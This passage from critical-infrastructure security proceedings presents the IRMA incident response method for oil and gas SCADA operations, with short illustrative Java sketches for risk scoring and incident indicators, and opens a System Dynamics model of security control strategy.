ICT-enabled power failures. In this respect the testbed activity helps to improve the human aspects involved in the resilience of the whole power system.

Acknowledgements. This work has been partially financed by the European Commission through the IST Project 27513 CRUTIAL, http://crutial.cesiricerca.it.
References
1. Abele-Wigert, I., Dunn, M.: An Inventory of 20 National and 6 International Critical Information Infrastructure Protection Policies. In: International CIIP Handbook 2006, vol. I. Center for Security Studies, ETH Zurich (2006)
2. Garrone, F., Brasca, C., Cerotti, D., Raiteri, D., Daidone, A., Deconinck, G., Donatelli, S., Dondossola, G., Grandoni, F., Kaâniche, M., Rigole, T.: Analysis of new control applications. CRUTIAL Workpackage 1 Deliverable D2. CRUTIAL consortium (2007)
3. Rinaldi, S., Peerenboom, J., Kelly, T.: Identifying, understanding, and analyzing critical infrastructure interdependencies. IEEE Control Systems Magazine 21(6), 11–25 (2001)
4. Deconinck, G., Beitollahi, H., Dondossola, G., Garrone, F., Rigole, T.: Testbed deployment of representative control algorithms. Technical report, CRUTIAL Workpackage 3 Deliverable D9. CRUTIAL consortium (2008)
5. Kueck, J., Kirby, B.: The distribution grid of the future. The Electricity Journal (Elsevier Science), 78–87 (June 2003)
6. Deconinck, G.: An evaluation of two-way communication means for advanced metering in Flanders (Belgium). In: Proceedings of the IEEE Int. Conf. on Instrumentation and Measurement Technology (I2MTC 2008), Victoria, Vancouver Island, Canada, pp. 900–905 (2008)
7. Vanthournout, K., De Brabandere, K., Haesen, E., Van Den Keybus, J., Deconinck, G., Belmans, R.: Agora: Distributed tertiary control of distributed resources. In: Proceedings of the 15th Power Systems Computation Conf. (PSCC 2005), Liege, Belgium (2005)
8. Vanthournout, K., Deconinck, G., Belmans, R.: A middleware control layer for distributed generation systems. In: Proceedings of the IEEE Power Systems Conference and Exhibition (PSCE 2004), New York City, USA (2004)
9. Deconinck, G., Rigole, T., Beitollahi, H., Duan, R., Nauwelaers, B., Van Lil, E., Driesen, J., Belmans, R., Dondossola, G.: Robust overlay networks for microgrid control systems. In: Proceedings of the Workshop on Architecting Dependable Systems (WADS 2007), co-located with the 37th Ann. IEEE/IFIP Int. Conf. on Dependable Systems and Networks (DSN 2007), Edinburgh, Scotland, UK, pp. 148–153 (2007)
10. Vu Van, T., Driesen, J., Belmans, R.: Power quality and voltage stability of distribution system with distributed energy resources. Int. Journal of Distributed Energy Resources 1, 227–240 (2005)
11. Hadjsaid, N., Canard, J., Dumas, F.: Dispersed generation impact on distribution networks. IEEE Computer Applications in Power 12(2), 22–28 (1999)
12. Dimeas, A., Hatziargyriou, N.: Operation of a multi-agent system for microgrid control. IEEE Transactions on Power Systems 20(3), 1447–1455 (2005)
13. McArthur, S., Davidson, E., Catterson, V.: Building multi-agent systems for power engineering applications. In: IEEE Power Engineering Society General Meeting 2006 (2006)
14. Rigole, T., Vanthournout, K., De Brabandere, K., Deconinck, G.: Agents controlling the electric power infrastructure. Int. Journal of Critical Infrastructures (IJCIS) 4(1/2), 96–109 (2008)
15. Dondossola, G., Lamquet, O.: Cyber risk assessment in the electric power industry. Cigré Electra Magazine 224 (2006)
16. Dondossola, G., Szanto, J., Masera, M., Fovino, I.: Effects of intentional threats to power substation control systems. Int. Journal of Critical Infrastructures (IJCIS) 4, 129–143 (2008)
17. Van Den Keybus, J., Bolsens, B., De Brabandere, K., Driesen, J.: Using a fully digital rapid prototype platform in grid-coupled power electronics applications. In: Proceedings of the 9th IEEE Conf. on Computers and Power Electronics (COMPEL 2004), Urbana-Champaign, USA (2004)
18. Xenomai: Real-Time Framework for Linux (2008), http://www.xenomai.org
A Structured Approach to Incident Response Management in the Oil and Gas Industry Maria B. Line, Eirik Albrechtsen, Martin Gilje Jaatun, Inger Anne Tøndel, Stig Ole Johnsen, Odd Helge Longva, and Irene Wærø SINTEF, N-7465 Trondheim, Norway {maria.b.line,eirik.albrechtsen,martin.g.jaatun, inger.a.tondel,stig.o.johnsen,odd.h.longva,irene.waro}@sintef.no
Abstract. Incident Response is the process of responding to and handling ICT-security-related incidents involving infrastructure and data. This has traditionally been a reactive approach, focusing mainly on technical issues. In this paper we present the Incident Response Management (IRMA) method, which combines traditional incident response with proactive learning and socio-technical perspectives. The IRMA method is targeted at integrated operations within the oil and gas industry.
1 Introduction
Offshore oil and gas installations are increasingly remotely operated and controlled [3], and this has also led to a situation where the technologies used are changing from proprietary stand-alone systems to standardised PC-based systems integrated in networks. The reliance on Commercial Off-The-Shelf (COTS) operating systems such as Microsoft Windows exposes the operators to more known information security vulnerabilities, and hence an increased probability of incidents. Increased networking between the Supervisory Control and Data Acquisition (SCADA) systems and the general ICT infrastructure (including the Internet) also increases the overall vulnerability. In North Sea operations, it has traditionally been assumed that SCADA systems were sheltered from the threats emerging from public networks [18]. The integration of ICT and SCADA systems makes this assumption void. There has been an increase in incidents related to SCADA systems [1], but these types of incidents and attacks are seldom reported and shared systematically [25] (pp. 13-18). The operating organisation is also changing; integrated operations enable better utilisation of expertise independent of geographical location, leading to more outsourcing and interaction between different professionals [3]. A great number of incidents are relatively harmless, mainly causing disturbances, frustration and reduced work efficiency. More harmful incidents may disable technical equipment, such as sensors, computers or network connections, which interrupts production continuity. Severe incidents may lead to a chain
of consequences, where the end result may be large economic losses, environmental damage and loss of life. Effective incident handling can minimize consequences, and thereby ensure business continuity. This paper presents a structured approach to incident management, taking into account technological as well as human and organisational factors. The remainder of this paper is structured as follows: Section 2 gives a brief presentation of the empirical background and motivation for developing the Incident Response Management (IRMA) method. Section 3 presents the three phases of IRMA in brief, with more details presented in Sections 4-6. Section 7 discusses the IRMA method and how to implement it in industry. Section 8 concludes the paper.
2 Empirical Background and Motivation
The development of the IRMA framework for the oil and gas industry is based on a combination of empirical sources. The conclusion from this empirical work [15] is that the oil and gas industry still does not consider information security to be something it needs to be concerned with. One consequence of this is that there are currently no systematic security incident handling schemes implemented in this industry. Incidents that are detected are treated in an ad-hoc manner, and there are reports of, e.g., virus infections that are left untreated for weeks [18]. Our research confirms that there exists a deep sense of mistrust between the process control engineers (who are in charge of SCADA systems) and ICT network administrators (who are in charge of office networks). The chasm between the two groups can be illustrated by a quote from an industry representative during a vulnerability assessment: “We don't have any ICT systems – we only have programmable logic.” This implies that simply implementing an established incident handling scheme would not work, since it would be perceived as something emanating from the “ICT people” – a successful incident response management scheme needs to demonstrate that it is based on the realities faced by the process control engineers (see Jaatun et al. [16] for details).
3 The Phases of IRMA
The IRMA method combines incident response as described in e.g. ISO/IEC TR 18044 [2] and NIST 800-61 [12] with increased emphasis on pro-active preparation and reactive learning. Our aim is to ensure that incident response procedures are continually improved, and that lessons learned are disseminated to the appropriate parts of the organisation. We focus mainly on organisational and human factors, and less on technical solutions. Fig. 1 illustrates the phases of the IRMA method:
– Prepare: planning for and preparation of incident response
– Detect and recover: detect incidents and restore to normal operation
– Learn: learning from incidents and how they are handled.
Fig. 1. The IRMA wheel
An organisation is likely to spend most of its time in the Prepare phase. The Detect and recover phase and the subsequent Learn phase are triggered by an incident (the bomb in Fig. 1). Effective detection, recovery and learning from incidents are, however, based on the preparations and proactive learning of the Prepare phase. Incident response does not operate in isolation in an organisation; it has to adjust to external dynamics, both within and outside the organisation. The Learn phase focuses on learning from single incidents. This learning is important, as it makes it possible to use the experiences from incident handling to improve the incident management work in all phases. In the following, the three suggested phases of incident response management are presented in more detail.
4 Prepare
The Prepare phase is where the organisation prepares to detect, handle and recover from security incidents and attacks. Other proactive tasks such as awareness raising are also considered part of the Prepare phase (see below).
4.1 Risk Assessment
A risk assessment entails identifying the most important unwanted incidents to your assets, and determining the probability and consequence of each incident. Risks are often documented in a risk matrix, as shown in e.g. [18]; a minimal sketch of such bookkeeping is given below. If you do not know which assets should be protected, and from what, it is impossible to prioritize and design the appropriate security measures; this makes a periodic risk assessment one of the most important activities related to information security.
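The following fragment illustrates the kind of probability-times-consequence bookkeeping behind a risk matrix. The five-point scales, the multiplicative score and the example entry are all assumptions made for illustration; the IRMA method does not prescribe them.

```java
/** Illustrative risk-matrix entry; the scales and scoring are assumed, not prescribed by IRMA. */
record Risk(String asset, String unwantedIncident, int probability, int consequence) {
    // Both scales assumed to run from 1 (low) to 5 (high).
    int score() { return probability * consequence; }          // position in the matrix
}

class RiskAssessmentDemo {
    public static void main(String[] args) {
        Risk r = new Risk("SCADA historian", "virus infection via office network", 3, 4);
        System.out.println(r.asset() + ": score " + r.score()); // high scores are treated first
    }
}
```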
4.2 Plans and Documentation
In an emergency situation, tacit knowledge may be your enemy – if the person with the knowledge is absent. This is why all routines, configurations, and systems must be documented in sufficient detail during the Prepare phase – and also kept continually updated as part of the “prepare cycle”.
4.3 Roles and Responsibilities
The main responsibilities regarding incident response are the following:
– Planning, preparation and training: ICT security management.
– Detect and alert: anyone who detects or suspects that an incident has occurred must raise an alert.
– Receive alerts: someone (either a person or a function) must be appointed to receive alerts. Everyone must know who to alert in any given situation.
– Provide technical expertise: someone, either inside or outside the organisation, must have technical system and/or security knowledge, and this knowledge must be available for incident recovery.
– Handle incident and recovery: someone must be responsible for leading the incident response work.
– Authority to make decisions: management must be on hand to make hard decisions.
– Follow-up activities, including the Learn phase: ICT security management.
The responsibilities of suppliers in case of incidents involving their systems should be explicitly included in contracts.
4.4 Awareness Creation and Training
The motivation for improving security awareness is twofold: preventing incidents from happening and improving the ability to detect and react to incidents. A general problem is that the reason for abnormal behaviour of systems is not understood, and hence many incidents are not detected, reported and handled. Thus, one of the biggest challenges related to information security incidents is that they are not detected by the users of the affected systems. Regular training exercises may have a double effect here: in addition to building and maintaining practical incident handling skills, the exercises remind users that abnormal system behaviour may be the symptom of an incident. Building a security culture in the setting of integrated operations comes with some special challenges: shift work, multiple organisations, and several specialist communities involved (land and platform, ICT and process systems). Management involvement will increase the impact of any awareness campaigns or initiatives.
4.5 Monitoring
In systematic control of management systems, feedback mechanisms have been utilised in many different business processes [13], e.g. financial results, production efficiency, market reputation, quality management, and Health, Safety, Security and Environment (HSSE) management. The field of safety management
has a tradition of using performance indicators for persistent feedback control [20]. We suggest implementing similar indicators to measure how the incident response performs over time, e.g. the time spent on each incident and the total number of incidents in a given period.
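A minimal sketch of how those two suggested indicators could be computed from an incident log follows; the record layout and method names are invented for this example.

```java
import java.time.Duration;
import java.time.Instant;
import java.util.ArrayList;
import java.util.List;

/** Sketch of the two suggested indicators; the data model is invented for illustration. */
class IncidentIndicators {
    record Incident(Instant detected, Instant recovered) {
        Duration handlingTime() { return Duration.between(detected, recovered); }
    }

    private final List<Incident> log = new ArrayList<>();

    void record(Instant detected, Instant recovered) {
        log.add(new Incident(detected, recovered));
    }

    /** Indicator 1: total number of incidents detected in a given period. */
    long countBetween(Instant from, Instant to) {
        return log.stream()
                  .filter(i -> !i.detected().isBefore(from) && i.detected().isBefore(to))
                  .count();
    }

    /** Indicator 2: mean time spent handling each incident in a given period. */
    Duration meanHandlingTime(Instant from, Instant to) {
        List<Incident> inPeriod = log.stream()
                  .filter(i -> !i.detected().isBefore(from) && i.detected().isBefore(to))
                  .toList();
        if (inPeriod.isEmpty()) return Duration.ZERO;
        Duration total = inPeriod.stream().map(Incident::handlingTime)
                                 .reduce(Duration.ZERO, Duration::plus);
        return total.dividedBy(inPeriod.size());
    }
}
```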
4.6 External Dynamics
Incident response management does not operate in isolation from other parts of the organisation or from the organisational context. It is also influenced by the general information security management strategy. This influence goes both ways, as each must be adjusted in light of lessons learned in the other area. Both are influenced by information security regulations.
5 Detect and Recover
The Detect and recover phase includes the detection, alerting, recovery and documentation of an incident. The recommendations made regarding detecting and recovering from incidents are based on various sources [2,12,9].
5.1 Alerting
Information security incidents are mainly detected in two ways [2]: by coincidence, where someone notices something unusual, or by routine use of technical security measures. The former is just as important as the latter, which means that each and every employee must be aware of their responsibility to raise an alert when they discover irregularities. Roles and responsibilities are already defined, so everyone knows who to alert and who is responsible for handling the incident. Regarding incident reporting there may be a lot to learn from experience within HSSE [17].
5.2 Assessment
The incident must be assessed with respect to severity and the way forward. The following actions take place [2]:
– Acknowledge receipt: the alerter is informed that handling has started.
– Collect more information: if necessary, more information is collected [12]. The goal is to determine the severity and scope of the incident, who should be involved in handling it, and whether it may affect production and/or safety.
– Further alerting: additional personnel needed for the handling must be alerted. The ideal incident management team in integrated operations includes experts on both ICT security and process control systems, which will lead to the best possible trade-offs between security and production. Suppliers may need to be involved.
5.3 Immediate Response
In a process control environment it is an imperative goal to keep the systems running as long as possible. Disconnecting them completely from external networks is, however, a reasonable first action. Activating surveillance techniques may be prudent in any case, to achieve a greater understanding of the incident. The best decisions at the time of an incident are made if one is prepared for the major types of incidents that may occur and the actions that should be taken in response to these incident types [25]. By escalation we mean getting help from outside the team. There may be several reasons for an escalation: the necessary competence is not available in the current team; one is not able to get the incident under control; the incident is more serious than first anticipated; or upper management decisions are necessary. Each incident must be documented with respect to what happened, which systems were affected, which damage occurred and how the incident was handled. Documentation of an incident starts when the alert is raised and continues throughout all steps of the incident handling. Documentation must be made easy – otherwise, it will not be performed. Any tools should be readily available and easy to use, and those involved should be trained in using them. Alternatively, one could simply describe the actions taken in an unstructured document or in a logbook [12]. The incident and the analysis of it must be documented in order to inform other actors about the incident and share good practice, as well as to keep a record of the incident that can be used to sustain learning from the incident or to analyse the incident at a later stage.
5.4 Communication Plan
It may be necessary to inform selected persons within or outside the organisation about the incident, such as: management at different levels – they may need to comment on the incident in public, and they should not have to hear about the incident through other channels (e.g. the media); those affected by the incident – they need to understand what happened, and why; and the media – if the incident is of public interest.
5.5 Recovering
The immediate responses seldom solve the entire problem; rather, they ensure that the incident is under control and limit the damage. Thereafter, actions must be taken to bring the affected system(s) back to normal operation, i.e. ensuring that they are in a safe state and reconnecting them to external networks. Configuration changes and patching will help reduce the vulnerability of the attacked system [2]. This should also be done for other systems that may be targeted by similar attacks in the near future. The incident may have led to malicious code being installed in the system that is hard to detect. To clean up, reinstalling from operating system installation media may be an alternative, possibly combined with backup copies and other recovery tools. Integrity checks and investigation tools may also be helpful [9].
5.6 The End of Recovery Is the Beginning of Learn...
When everything is up and running again, the experiences should be explored to improve the preparedness of the organisation. This is the focus of the Learn phase, which is presented in the following section. The Learn phase should be started while the incident is still fresh in people's minds. But first: the person who raised the alert about the incident must be briefed on how the incident was handled. This is an important part of awareness raising in incident management.
6 Learn
The learning phase of IRMA focuses on learning from the actual incident [8] through four different steps, in addition to a parallel activity of learning from the handling of the incident.
6.1 Commitment and Resources
In order to succeed with learning, the organisation must be prepared for it. The key issue is the extent of management commitment and the willingness to spend resources on learning from incidents. Learning processes depend on documentation of the incident, as stressed in the Detect and recover phase. A structured accident analysis methodology will help identify immediate and underlying causes, and should cover organisational, technical and human factors issues.
6.2 What Occurred - Identify Sequences of Events Using STEP
The STEP method [14] is a tool for detailed analysis of incidents and accidents. It allows for a graphic presentation of the events during the scenario, in the following manner (a possible data representation is sketched below):
– Actors (i.e. persons or objects that affect the incident) are identified.
– Events that influenced the incident and how it was handled are identified and placed in the diagram according to the order in which they occurred.
– The relationship between the events, i.e. what caused each of them, is identified and shown in the diagram by drawing arrows to illustrate causal links.
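STEP itself is a diagram-based analysis technique, but its elements map naturally onto a simple data model, which can be useful if incident records are to be kept electronically. The sketch below is purely illustrative and not part of the method as published.

```java
import java.time.Instant;
import java.util.ArrayList;
import java.util.List;

/** Illustrative data model for a STEP diagram; not part of the published method. */
class StepDiagram {
    /** An event carried out by an actor, placed on the time line. */
    record Event(String actor, String description, Instant when) {}
    /** A causal link: 'cause' contributed to 'effect' (an arrow in the diagram). */
    record CausalLink(Event cause, Event effect) {}

    final List<Event> events = new ArrayList<>();
    final List<CausalLink> links = new ArrayList<>();

    Event addEvent(String actor, String description, Instant when) {
        Event e = new Event(actor, description, when);
        events.add(e);       // events are kept in the order in which they occurred
        return e;
    }

    void link(Event cause, Event effect) {
        links.add(new CausalLink(cause, effect));
    }
}
```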
6.3 Why - Identify Root Causes and Barriers
The STEP diagram can be used to fully understand the root causes and consequences of weak points and security problems. This is done by identifying weak points in the incident description and representing them by triangles in the STEP diagram. A figure illustrating a STEP diagram can be found in [16]. The weak points should subsequently be assessed by a barrier analysis, including the suggestion of countermeasures (see e.g. [19]). Barriers are here understood to be technical, human and organisational.
6.4 Recommend Security Improvements
The accident analysis, the identified weak points and the suggested barriers represent the necessary background for identifying security recommendations. It is important to prioritise the suggested actions based on a cost/benefit analysis, and to explicitly assign responsibility for performing the actions.
6.5 Evaluate the Incident Handling Process
The Learn phase also includes an evaluation of the incident handling process itself. Experience from the handling process should be used to improve the management of future incidents. Ideally, all relevant parties should be involved shortly after an incident has occurred and been handled, while the information is still fresh in people's minds. Factors to consider include [2]:
– Did the incident management plan work as intended?
– Were all relevant actors involved at the right time?
– Are there procedures that would have aided detection of the incident?
– Were any procedures or tools identified that would have been of assistance in the recovery process?
– Was the communication of the incident to all relevant parties effective throughout the detection and recovery process?
7 Discussion
This paper has described a framework for incident response management in the North Sea oil and gas industry. There are several other publications describing similar approaches to incident handling, e.g. [2,12,5,4,22,11]. Our approach follows the same basic ideas presented in the literature above, but differs from these in three ways: 1) its emphasis on socio-technical aspects covering the interplay between individuals, technology and organisation; 2) its emphasis on learning in a reactive and pro-active way; and 3) its range of use for ICT/SCADA systems in the oil and gas industry. The first two of these contributions are discussed in this section. First, we discuss why a socio-technical approach is necessary for incident handling in integrated operations in the petroleum industry. Then we discuss why learning from incidents is important, but also challenging.
7.1 Socio-technical Approach to Incident Handling
A socio-technical information security system [6] is created by elements of different information security processes and the interplay between these elements. Traditional incident handling [2,4,12] has mainly focused on the technical aspects of incident response. The framework described in this paper also focuses on individual behaviour and organisational processes. This is shown, for example, by the emphasis on organisational roles, awareness training, risk assessment processes and follow-up activities in the Prepare phase; on roles in the Detect and
recover phase; and on the involvement of actors in learning activities. In general, the information security domain has lacked focus on socio-technical approaches [10,23]. Our approach to incident response thus contributes to a wider perspective on information security management, as it considers information security as a socio-technical system. The Prepare phase described in Section 4 shows how technological solutions, individuals, and organisational structures and processes are primed to be ready to discover and deal with incidents, as well as to prevent incidents from happening. These assets are important in the development and maintenance of a socio-technical incident handling system, but also in making the system proactive. The learning processes suggested in this paper emphasise organisational learning, i.e. changes in the organisational interplay between individuals and groups, including modifications of organisational processes and structures [7]. This approach implies that incident learning should emphasise both single-loop and double-loop learning [7], i.e. response based on the difference between expected and obtained outcome (single-loop) and the ability to question and change the governing variables related to technology, organisation and human factors that lead to the outcome (double-loop). The latter is necessary for long-term socio-technical effects, while the former is more concerned with fire-fighting and technological solutions. Although empirical findings show that there are few incidents in the oil and gas industry, the same findings indicate that systematic analyses of incidents and organisational learning are seldom performed in practice [16]. The root causes of incidents are not always documented and there is a main focus on technical issues when studying incidents. Organisational and human factors issues are seldom explored. Different professional disciplines are a challenge for the learning capability of an organisation, as different roles and positions should be involved in incident learning processes. In our interaction with the oil and gas industry we have experienced the communication gap between ICT staff and process control staff. These groups have traditionally not needed to cooperate, and have had different interests. The increased use and interconnectivity of ICT systems has resulted in increased information security threats also towards process control systems. For efficient handling of security incidents in SCADA systems these two groups need to cooperate. The communication gap between these two groups has been taken into account in the IRMA method. Challenges regarding different risk perceptions and situational understandings are best approached by discourse-based strategies [21,24], where the involved actors meet and discuss challenges with each other, aiming at a common understanding.
7.2 Learning from Incidents
Incidents are unwanted occurrences. At the same time, they represent invitations to learn about risks and vulnerabilities in the socio-technical systems that are supposed to control these weaknesses. By using the experience from incidents and the incident handling processes in a proper manner, the organisation will be
able to improve its overall security performance. Learning from incidents should thus be a planned part of incident handling, and the necessary resources for this activity must be allocated. The incident response management framework proposed in this paper describes such a learning approach, in both a reactive and a pro-active manner: reactive in the sense that one learns from actual incidents and incident handling, and pro-active in the sense that the incident handling system is adjusted to lessons learned both internally and in the organisation's context. Based on the premise that incident response management is a socio-technical system, the learning processes have emphasised organisational learning. In general, there are two obstacles to organisational learning: embarrassing and threatening issues [7]. Information security incidents may be embarrassing (e.g. virus infections due to incautious use of the Internet) and threatening in the sense that the incidents are considered confidential. These characteristics create individual and organisational behaviour that is counter-productive when it comes to learning from unwanted incidents. These defensive routines may in fact be the reason that our empirical research indicated so few incidents in the industry. However, the empirical study of incident handling in the oil and gas industry showed that several informants called for more frankness and openness about unwanted incidents, to enable learning both internally in an organisation and cross-organisationally, which requires more communication about incidents within and across organisations.
8 Conclusion
A systematic approach to incident response and learning from incidents is important to the oil and gas industry because of the recent developments regarding integrated operations. Even though the industry experiences few incidents at the moment, more technological and organisational changes are still to come, and not being prepared for greater risk and new and unforeseen threats may be very costly to a business that depends on approximately zero downtime in its production systems. The IRMA method is first and foremost developed with respect to the oil and gas industry, but it should also be applicable to other industries that rely on process control systems and integrated/remote operations. Our method is innovative for incident handling in its pro-activity and organisational focus. Oil and gas production requires cooperation between many organisations, including operators, various suppliers and regulatory authorities. This must be taken into account when implementing IRMA. It is not enough for an operator to consider only the operator organisation, since the cooperation of suppliers is highly important when preparing for, detecting, recovering from and learning from incidents. We therefore recommend that IRMA be implemented for installations rather than organisations. Since implementation of the IRMA method will require resources, ideally before an incident occurs, the success of IRMA requires that management is convinced of the benefits of incident management and willing to spend time and resources on preparation.
Acknowledgements. This work was carried out in the IRMA project, 2005-2007, financed by the Norwegian Research Council and the Norwegian Oil Industry Association.
References
1. Hackers Have Attacked Foreign Utilities, CIA Analyst Says, http://www.washingtonpost.com/wp-dyn/content/article/2008/01/18/AR2008011803277.html
2. Information technology - Security techniques - Information security incident management. Tech. Rep. TR 18044:2004, ISO/IEC (2004)
3. Integrated Operations on NCS (2004), http://www.olf.no/?22894.pdf
4. Information technology - security techniques - code of practice for information security management, ISO/IEC Std. 27002 (2005)
5. Information technology - security techniques - information security management systems - requirements, ISO/IEC Std. 27001 (2005)
6. Albrechtsen, E.: Friend or foe? Information security management of employees. Ph.D. thesis, NTNU (2008)
7. Argyris, C., Schön, D.A.: Organisational learning: A theory of action perspective. Addison-Wesley, Reading (1978)
8. Cooke, D.L.: Learning from Incidents. In: Proceedings of the 21st System Dynamics Conference (2003)
9. Cormack, A., et al.: TRANSITS course material for training of network security incident teams staff. Tech. rep., TERENA (2005)
10. Dhillon, G., Backhouse, J.: Current directions in IS security research: towards socio-organizational perspectives. Information Systems Journal 11(2), 127–153 (2001)
11. Forte, D.: Security standardization in incident management: the ITIL approach. Network Security 2007(1), 14–16 (2007)
12. Grance, T., Kent, K., Kim, B.: Computer security incident handling guide. Tech. Rep. Special Publication 800-61, NIST (2004), http://csrc.nist.gov/publications/nistpubs/800-61/sp800-61.pdf
13. Hammer, M., Champy, J.A.: Re-engineering the Corporation: A Manifesto for Business Revolution. Harper Collins (1993)
14. Hendrick, K., Benner, L.: Investigating accidents with STEP. CRC Press, Boca Raton (1986)
15. Jaatun, M.G., Albrechtsen, E., Line, M.B., Johnsen, S.O., Wærø, I., Longva, O.H., Tøndel, I.A.: A Study of Information Security Practice in a Critical Infrastructure Application. In: Rong, C., Jaatun, M.G., Sandnes, F.E., Yang, L.T., Ma, J. (eds.) ATC 2008. LNCS, vol. 5060, pp. 527–539. Springer, Heidelberg (2008)
16. Jaatun, M.G., Johnsen, S.O., Line, M.B., Longva, O.H., Tøndel, I.A., Albrechtsen, E., Wærø, I.: Incident Response Management in the oil and gas industry. Tech. Rep. SINTEF A4086, SINTEF ICT (2007), http://www.sintef.no/upload/10977/20071212_IRMA_Rapport.pdf
17. Jaatun, M.G. (ed.): Arbeidsseminar om IKT-sikkerhet i Integrerte Operasjoner: Referat (in Norwegian only). Tech. rep., SINTEF (2007), http://www.sintef.no/upload/10977/sluttrapport.pdf
18. Johnsen, S.O., Ask, R., Røisli, R.: Reducing Risk in Oil and Gas Production Operations. In: Goetz, E., Shenoi, S. (eds.) First Annual IFIP WG 11.10 International Conference, Critical Infrastructure Protection (2007)
19. Johnsen, S.O., Bjørkli, C., Steiro, T., Fartum, H., Haukenes, H., Ramberg, J., Skriver, J.: CRIOP: A scenario method for Crisis Intervention and Operability analysis. Tech. Rep. STF38 A03424, SINTEF (2003), www.criop.sintef.no
20. Kjellén, U.: Prevention of accidents through experience feedback. Taylor and Francis, Abington (2000)
21. Klinke, A., Renn, O.: A new approach to risk evaluation and management: risk-based, precaution-based and discourse-based strategies. Risk Analysis 22(6), 1071–1094 (2002)
22. Mitropoulos, S., Patsos, D., Douligeris, C.: On Incident Handling and Response: A state-of-the-art approach. Computers & Security 25(5), 351–370 (2006)
23. Siponen, M.T., Oinas-Kukkonen, H.: A review of information security issues and respective research contributions. Database for Advances in Information Systems 38(1), 60 (2007)
24. Slovic, P.: The perception of risk. Earthscan, London (2000)
25. Stouffer, K., Falco, J., Kent, K.: Guide to industrial control systems (ICS) security (2nd draft). Tech. Rep. Special Publication 800-82, NIST (2007), http://csrc.nist.gov/publications/drafts/800-82/2nd-Draft-SP800-82-clean.pdf
Security Strategy Analysis for Critical Information Infrastructures Jose Manuel Torres, Finn Olav Sveen, and Jose Maria Sarriegi Tecnun (University of Navarra), Manuel de Lardizábal 13, 20018 San Sebastián, Spain
[email protected],
[email protected],
[email protected]

Abstract. How do security departments relate to and manage information security controls in critical infrastructures (CI)? Our experience is that information security is usually seen as a technical problem with technical solutions. Researchers agree that there are more than just technical vulnerabilities. Vulnerabilities in processes and human fallibility create a need for Formal and Informal controls in addition to Technical controls. These three controls are not independent; rather, they are interdependent. They vary widely in implementation times and resource needs, making building security resources a challenging problem. We present a System Dynamics model which shows how security controls are interconnected and interdependent. The model is intended to aid security managers in CI to better understand information security management strategy, particularly the complexities involved in managing a socio-technical system where human, organisational and technical factors interact.
1 Introduction

Security is a multifaceted problem encompassing both logical and physical issues. Protection is no longer a matter of locking the door to keep out unwanted guests. Today, those “guests” enter through fibre optic cables. We use technology to simplify our lives and to become more effective. However, technology evolves rapidly. New technology is often unproven and poorly understood, even by those who designed it. Technology is frequently deployed by people who only have knowledge of the technical principles behind it. In such an environment there will always be non-technical weaknesses to exploit, and staying secure will be resource intensive, as controls must be created, maintained and audited to ensure that they work. Information security, extremely vital in critical infrastructures (CI) such as energy, transportation, health and many others, competes for resources. In these complex and critical systems, in which technology, processes and people exist together, security cannot be approached as a mere technological issue. “If you think technology can solve all your security problems, then you do not understand the problems nor the technology” [1]. The analysis and control of the distribution of security efforts in CI is a key factor in improving the prevention, detection and mitigation of current vulnerabilities. Technologically-focused CI security management strategies hide organisational and social issues; for example, a formal vulnerability (e.g. not updating a security process) in one CI could cause a technical vulnerability in another CI [2].
Security experts point to the need to understand the interdependencies between security controls in order to successfully protect critical information infrastructures [1,3,4]. However, little has been said about the impact that the interdependencies between security controls and their dynamics have on strategy effectiveness [2,5]. Failing to understand these interdependencies and their dynamics can result in ineffective strategies and poor coordination between decision makers and the people responsible for rescue, recovery and restoration after incidents. We present a System Dynamics (SD) model that shows how CI security controls interact, and the consequent implications for resource allocation among them. SD is a modelling methodology that focuses on analysing the underlying structure that generates the behaviour of complex systems [6,7]. This structure is constituted by feedback, accumulations, and information and material delays. SD models can be either qualitative or quantitative. The qualitative model of CI security presented here is the integrated result of a literature review [8] and a Group Model Building (GMB) exercise with practitioners from industry [9]. GMB is a methodology for collaboratively building SD models [10,11,12]. It is an effective way of de-fragmenting the partial mental models found in representative multidisciplinary teams. GMB elicits partial mental models, makes them explicit, combines them, resolves clashes and ambiguities, and creates new insight and consensus. The result is new knowledge that is shared between participants. Security strategy is like any other business strategy. Strategy is the process of building up resources that can aid us [13,14]. We use this Resource-Based View of strategy to explain the three-sided CI security strategy. Strategy consists of having resources and building resources. The true management challenge is to build and sustain resources, not to allocate them [13,14]. In this way, security controls are resources like any other resources. We explain the current situation of security management strategy in CI and suggest how it should be redesigned.
2 Reactive Perspective on CI Information Security
If incidents are infrequent, security will most likely not have a high priority until a serious incident happens. In the model (Fig. 1), the variables Incidents and Impact represent the incidents suffered by a critical infrastructure and the consequences of those incidents, respectively. The (+) sign next to the arrow from Incidents to Impact indicates that increased frequency and/or severity of incidents will increase the impact suffered by the CI. The same applies in the opposite direction: fewer serious attacks lead to fewer consequences. Hence, a change in Incidents causes a change in Impact in the same direction. A small incident is not enough to significantly change the organisation's perception of security. Many smaller incidents over time, or one or more large incidents over a shorter time period, may cause a change in management's perception of security (see Fig. 2). In the model in Fig. 1, this is represented by the link from Impact to Perceived Impact Trend. The (//) mark over the arrow denotes a time delay: perceptions rarely change instantly; they adjust and adapt over time. Hence, Perceived Impact Trend is negatively affected by Time to Change Perception of Impact Trend.
Fig. 1. Reactive Security
Negative influence (-) means that the influence moves in the opposite direction. If Time to Change Perception of Impact Trend increases, Perceived Impact Trend will take longer to adjust to Impact. The opposite is also true: a decrease will make Perceived Impact Trend adjust faster. When hit by an incident, the organisation is painfully made aware of its security shortcomings. If a large Perceived Security Gap is identified, more security resources are allocated to acquire new security controls. After new security controls have been decided on, represented by the Initiation Rate, they must be implemented, a process which takes time. This is represented in the model by the controls first residing in the stock Initiated Security Controls and then being gradually moved over to Security Controls in Place at a speed decided by the Implementation Rate. When the controls are in place, they stop incidents or reduce their impact. We now have a closed feedback loop, named B1. This is a balancing, or goal-seeking, feedback loop; in this case, its goal is the Desired Security Level. If the security department perceives security to differ from desired security, resources are adjusted until a satisfactory level is reached. An important consequence of this loop is that the security level is perceived indirectly: as long as nothing is happening, the security level is perceived as adequate. Another consequence of B1 is that if resources for security are increased in response to incidents, security resources will gradually be reduced over time unless the incidents continue constantly. More controls cause less impact, which will over time cause management to perceive the security level as higher than necessary.
Fig. 2. Management Perception of Security
